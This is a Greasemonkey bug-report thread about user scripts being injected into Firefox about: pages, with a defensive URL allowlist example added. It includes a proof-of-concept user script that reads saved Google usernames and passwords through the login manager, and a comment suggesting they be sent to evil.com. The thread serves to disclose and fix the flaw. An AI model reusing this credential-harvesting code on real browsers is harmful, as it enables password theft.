Closed Martii closed 13 years ago
Reported upstream at greasemonkey#1302
monkey menu has been completely refactored and broken as acknowledged in greasemonkey#1306 in this commit forward thus invalidated this report. Still present in GM 0.9.1 release.
Closing as invalidated by greasemonkey@4e5e3ec
Reported upstream in this comment as
monkey menu has been completely refactored and broken, as acknowledged in #1306, by this commit forward thus invalidated this report. Still present in GM 0.9.1 release.
Closing as invalidated-by would be a more proper tag along with commit reference.
Reopened by greasemonkey#1375
LouCypher wrote
Steps to reproduce:
1. Enable "greasemonkey.aboutIsGreaseable" in about:config (set it to true)
2. Install this script
```
// ==UserScript==
// @name        Retrieving passwords via about: pages
// @namespace   http://mozilla.status.net/loucypher
// @include     about:*
// ==/UserScript==

var hostname = 'https://www.google.com';
var formSubmitURL = 'https://www.google.com'; // not http://www.example.com/foo/auth.cgi
var httprealm = null;
var username, password;

try {
  var myLoginManager = Components.classes["@mozilla.org/login-manager;1"].
                         getService(Components.interfaces.nsILoginManager);
  var logins = myLoginManager.findLogins({}, hostname, formSubmitURL, httprealm);
  var info = "";
  for (var i = 0; i < logins.length; i++) {
    info += logins[i].username + "\n";
    info += logins[i].password + "\n\n";
  }
  //GM_log(info);
  alert(info); // show usernames and passwords for google.com
               // or send to evil.com via XHR (untested)
} catch(ex) {
  // This will only happen if there is no nsILoginManager component class
  //GM_log(ex);
}
```
Expected result:
User script should not have chrome privileges and should not have access to XPCOMs
Actual result:
Display usernames and passwords (could be worse)
Upstream comment
Historical issue reference:
#1302
Upstream comment
arantius wrote: In regards to security I am +1 for this. Moz and other addons are starting to create about: entries of their own and I would really rather not see user.js become a security threat to other add-ons including the Moz core. We could never really handle all of them especially if GM isn't aware of them.
Still thinking we should just drop this feature (injecting into about:s besides blank) altogether. about:blank had some issues last time I tested it to with document.write but that was a while ago.
Closed by greasemonkey@80c62e8
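Added example, not part of the thread and not Greasemonkey's code: one way to express the "no about: pages besides blank" rule discussed above as a URL gate that no preference can widen. The names isInjectable and ALLOWED_SCHEMES and the http/https allowlist are assumptions made for illustration; the sample URLs are constructed.

```javascript
// Hypothetical allowlist of schemes a user script may run on (assumption).
const ALLOWED_SCHEMES = new Set(["http", "https"]);

// Decide whether a user script may be injected into the document at `url`.
// about: pages are privileged browser UI, so only about:blank is accepted,
// whatever an @include rule such as "about:*" asks for.
function isInjectable(url) {
  if (typeof url !== "string") return false;
  const m = /^([a-z][a-z0-9+.-]*):(.*)$/is.exec(url.trim());
  if (!m) return false;                  // no scheme at all: refuse
  const scheme = m[1].toLowerCase();     // schemes are case-insensitive
  if (scheme === "about") {
    // Drop any query or fragment before comparing the page name, so
    // "about:blank#x" is still blank while "about:blankx" is not.
    const page = m[2].split(/[?#]/, 1)[0].toLowerCase();
    return page === "blank";
  }
  // Everything else (chrome:, resource:, file:, ...) is refused by default.
  return ALLOWED_SCHEMES.has(scheme);
}

// Constructed sample URLs covering the cases raised in this report.
const samples = [
  "about:addons",
  "ABOUT:Config",
  "about:blank",
  "about:blank#frag",
  "about:blankx",
  "chrome://browser/content/browser.xul",
  "https://www.google.com/",
];
for (const u of samples) {
  console.log((isInjectable(u) ? "inject " : "refuse ") + u);
}
```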
Original title: Script injection attempted in about:addons
In Firefox 4.x, Greasemonkey attempts to inject a script when @include rule is set to about:addons and user navigates to about:addons which also throws this warning
Sample script
The monkey menu also reflects this attempt as being successfully injected however no alert happens. It is handy to have the popup menu available however it shouldn't reflect nor try to inject a script at this URI.